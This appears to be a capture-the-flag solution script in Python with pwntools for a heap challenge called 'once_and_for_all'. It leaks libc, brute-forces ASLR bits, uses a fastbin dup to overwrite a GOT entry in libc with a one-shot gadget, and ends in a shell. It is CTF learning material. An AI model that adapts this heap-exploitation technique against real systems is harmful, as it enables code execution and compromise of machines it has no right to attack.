1. fastbin consolidate to leak libc
2. brute force 4 bits of ASLR to get a value of 0x3e into libc got
3. fastbin dup into libc got
4. fastbin dup a bit further down
5. overwrite the strchrnul got entry to one shot gadget
6. printf calls strchrnul internally -> win

from pwn import *

elf = context.binary = ELF("./once_and_for_all")

libc = ELF("./libc.so.6")

def add(idx, size, payload=b'A'):
    p.sendlineafter(b'>> ', b'1')
    p.sendlineafter(b': ', str(idx).encode())
    p.sendlineafter(b': ', str(size).encode())
    p.sendafter(b': \n', payload)

def fix(idx, size, payload):
    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b': ', str(idx).encode())
    p.sendlineafter(b': ', str(size).encode())
    p.sendafter(b': \n', payload)
    p.sendlineafter(b'>> ', b'2')

def free(idx):
    p.sendlineafter(b'>> ', b'2')
    p.sendlineafter(b': ', str(idx).encode())
    p.sendlineafter(b': ', str(0x0).encode())

def examine(idx):
    p.sendlineafter(b'>> ', b'3')
    p.sendlineafter(b': ', str(idx).encode())

def add_big(size):
    p.sendlineafter(b'>> ', b'4')
    p.sendlineafter(b': ', str(size).encode())

def libc_leak():
    add(0, 0x20)
    free(0)
    add_big(0x5b0)
    add(1, 0x28)
    free(0)
    examine(0)
    return u64(p.recv(6).ljust(8, b'\x00'))

while True:
    # p = remote('68.183.37.6', 31490)
    p = process("./once_and_for_all")

    libc.address = libc_leak() - 0x3ebca0
    log.info(f'libc @ 0x{libc.address:x}')

    # 4 bits bruteforce
    if (libc.address + 0x616000) & 0xffff == 0:
        break

    libc.address = 0
    p.close()

# fastbin dup into libc got
add(2, 0x28)
add(3, 0x28)
free(3)
free(2)
free(3)
fix(2, 0x28, p64(libc.address + 0x3eb000 - 8 + 2))  # gef➤  tele 0x7f667597a000+0x3eb000-8+2
                                                    # 0x00007f6675d64ffa│+0x0000: 0xab80000000000000
                                                    # 0x00007f6675d65002│+0x0008: 0x000000000000003e

add(4, 0x28)
add(5, 0x28)
add(6, 0x28, flat({0x20 - 2: 0x40})) # place 0x40 there for the next stage

# fastbin dup a bit further down
add(7, 0x38)
add(8, 0x38)
free(8)
free(7)
free(8)
fix(7, 0x38, p64(libc.address + 0x3eb000 + 0x20))
add(9, 0x38)
add(10, 0x38)
add(11, 0x38, flat({24: libc.address + 0x4f322})) # strchrnul got entry -> one shot

# printf calls strchrnul internally -> win
p.interactive()